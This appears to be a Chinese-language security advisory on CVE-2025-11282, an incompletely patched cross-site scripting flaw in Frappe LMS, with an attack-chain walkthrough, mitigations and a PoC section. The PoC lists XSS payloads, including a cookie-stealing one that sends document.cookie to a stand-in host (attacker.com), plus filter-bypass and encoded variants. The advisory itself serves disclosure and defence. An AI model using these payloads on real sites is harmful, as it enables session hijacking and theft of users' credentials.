CVE-2025-11282：Frappe LMS 跨站脚本漏洞（不完全修复）

漏洞信息

漏洞编号

CVE-2025-11282

漏洞类型

跨站脚本（XSS）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Frappe LMS

漏洞概述

CVE-2025-11282 是 Frappe LMS 学习管理系统 2.34.x 和 2.35.0 版本中存在的跨站脚本（XSS）漏洞。该漏洞源于对先前 CVE-2025-55006 的修复不完整，属于不完全修复（Incomplete Fix）类型的漏洞。Frappe LMS 是一款基于 Frappe 框架构建的开源学习管理平台，广泛用于在线课程发布、学生管理和教学互动等场景。

该漏洞的 CVSS 3.1 评分为 2.4 分，属于低危级别。攻击者需要具备高权限（PR:H）才能利用此漏洞，并且需要用户交互（UI:R）才能触发攻击。攻击通过网络进行（AV:N），攻击复杂度较低（AC:L）。该漏洞对机密性无影响（C:N），对完整性有低影响（I:L），对可用性无影响（A:N）。

值得注意的是，该漏洞的发现者通过 VulDB 平台披露了此问题，并指出供应商虽然确认了包括此漏洞在内的四个安全问题已修复，但 GitHub 上的发布说明并未提及这些修复内容。目前该漏洞的利用方式已公开，可能被攻击者利用。安全研究人员 0xHamy 在 GitHub Gist 上发布了详细的复现步骤。

技术细节

CVE-2025-11282 是一个存储型或反射型跨站脚本（XSS）漏洞，位于 Frappe LMS 的某个未知函数中，是 CVE-2025-55006 修复的不完全补丁。

漏洞原理：
1. Frappe LMS 在处理用户输入时，未能充分过滤或转义某些特殊字符（如 <、>、"、' 等 HTML/JavaScript 敏感字符）。
2. 之前的 CVE-2025-55006 修复尝试对部分输入进行了过滤，但遗漏了某些代码路径或输入字段，导致攻击者仍可通过未修补的入口注入恶意脚本。
3. 攻击者利用高权限账户（如管理员或教师账户）在系统中提交包含恶意 JavaScript 代码的内容。
4. 当其他用户浏览包含恶意内容的页面时，浏览器会执行注入的脚本，从而实现会话劫持、Cookie 窃取、钓鱼攻击或其他恶意操作。

利用条件：
- 攻击者需要拥有系统的高权限账户（如管理员、教师或内容编辑者）
- 需要受害者用户访问包含恶意内容的页面（用户交互）
- 攻击通过远程网络进行

利用方式：
攻击者通过系统中仍存在 XSS 漏洞的输入点（如课程描述、用户个人资料、评论等字段），注入精心构造的 JavaScript 代码。这些代码在受害者浏览器中执行后，可窃取会话令牌、重定向用户到恶意网站，或执行其他未授权操作。

攻击链分析

STEP 1

步骤1：获取高权限账户

攻击者通过社会工程学、凭证填充或其他方式获取 Frappe LMS 系统的高权限账户（如管理员、教师或内容编辑者账户）。

STEP 2

步骤2：识别未修补的输入点

攻击者分析 CVE-2025-55006 的修复补丁，识别出修复不完整的输入字段或代码路径，找到仍然存在 XSS 漏洞的注入点。

STEP 3

步骤3：注入恶意脚本

攻击者在未修补的输入字段中注入精心构造的恶意 JavaScript 代码，如窃取 Cookie、会话令牌或执行其他恶意操作的脚本。

STEP 4

步骤4：等待受害者访问

攻击者等待受害用户（如普通学员）访问包含恶意内容的页面，触发用户交互条件。

STEP 5

步骤5：执行恶意代码

受害者的浏览器执行注入的恶意脚本，攻击者可窃取会话信息、重定向用户到钓鱼页面或执行其他未授权操作。

STEP 6

步骤6：利用窃取的信息

攻击者利用窃取的会话令牌或凭证，进一步提升权限或执行横向移动，危害整个系统安全。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11282 PoC - Frappe LMS XSS via Incomplete Fix -->
<!-- Based on the incomplete fix for CVE-2025-55006 -->
<!-- Reference: https://gist.github.com/0xHamy/c2a81f2d1c779c513fa3db6f3ad24544 -->

<!-- Steps to Reproduce: -->
<!-- 1. Login to Frappe LMS with a high-privilege account (admin/teacher) -->
<!-- 2. Navigate to a vulnerable input field that was not properly patched -->
<!-- 3. Inject the following XSS payload into the field -->
<!-- 4. Save the content and wait for a victim user to view the page -->

<!-- Example XSS Payload -->
<script>alert('XSS-CVE-2025-11282')</script>

<!-- More sophisticated payload for session stealing -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Payload using event handlers -->
<svg onload="alert(document.domain)">

<!-- Bypass attempt for incomplete sanitization -->
<scr<script>ipt>alert('XSS')</scr</script>ipt>

<!-- Using HTML entities or encoding bypass -->
<img src="x" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;">

影响范围

Frappe LMS 2.34.x

Frappe LMS 2.35.0

防御指南

临时缓解措施

在等待官方完整修复补丁发布之前，建议采取以下临时缓解措施：1）审查并限制系统中高权限账户的分配，仅授予必要的人员；2）在 Web 应用防火墙（WAF）中添加针对 XSS 攻击的规则，检测和阻断常见的 XSS payload；3）部署内容安全策略（CSP）头部，限制内联脚本的执行；4）定期检查系统中用户提交的内容，清理可疑的脚本代码；5）监控异常的用户行为和会话活动，及时发现潜在的攻击；6）参考 GitHub Security Advisory GHSA-mvxw-r9x4-3vrr 获取最新的安全更新信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11282
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11282
3 Details https://www.cvedetails.com/cve/CVE-2025-11282/
4 VulDB https://vuldb.com/cve/CVE-2025-11282
5 Link https://gist.github.com/0xHamy/c2a81f2d1c779c513fa3db6f3ad24544#steps-to-reproduce
6 Link https://github.com/frappe/lms/
7 Link https://github.com/frappe/lms/security/advisories/GHSA-mvxw-r9x4-3vrr
8 Link https://vuldb.com/?ctiid.327016
9 Link https://vuldb.com/?id.327016
10 Link https://vuldb.com/?submit.659696
11 Link https://gist.github.com/0xHamy/c2a81f2d1c779c513fa3db6f3ad24544#steps-to-reproduce
12 Link https://vuldb.com/?submit.659696